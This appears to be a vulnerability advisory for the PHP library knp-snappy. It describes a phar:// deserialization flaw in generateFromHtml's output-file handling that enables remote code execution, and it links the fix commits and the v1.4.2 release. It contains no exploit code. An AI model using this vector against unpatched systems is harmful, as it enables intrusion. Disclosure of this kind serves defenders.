knplabs/knp-snappy is vulnerable to Remote Code Execution (RCE). The vulnerability is due to the library not checking the file type during upload, which allows an attacker to upload a phar://
file which will be deserialized during the file_exists
function because it fails to check the file type, resulting in Remote Code Execution. If a user can control the output file from the generateFromHtml
function, arbitrary deserialization will occur.
github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670
github.com/KnpLabs/snappy/blob/v1.4.1/src/Knp/Snappy/AbstractGenerator.php#L670
github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6
github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3
github.com/KnpLabs/snappy/pull/469
github.com/KnpLabs/snappy/releases/tag/v1.4.2
github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc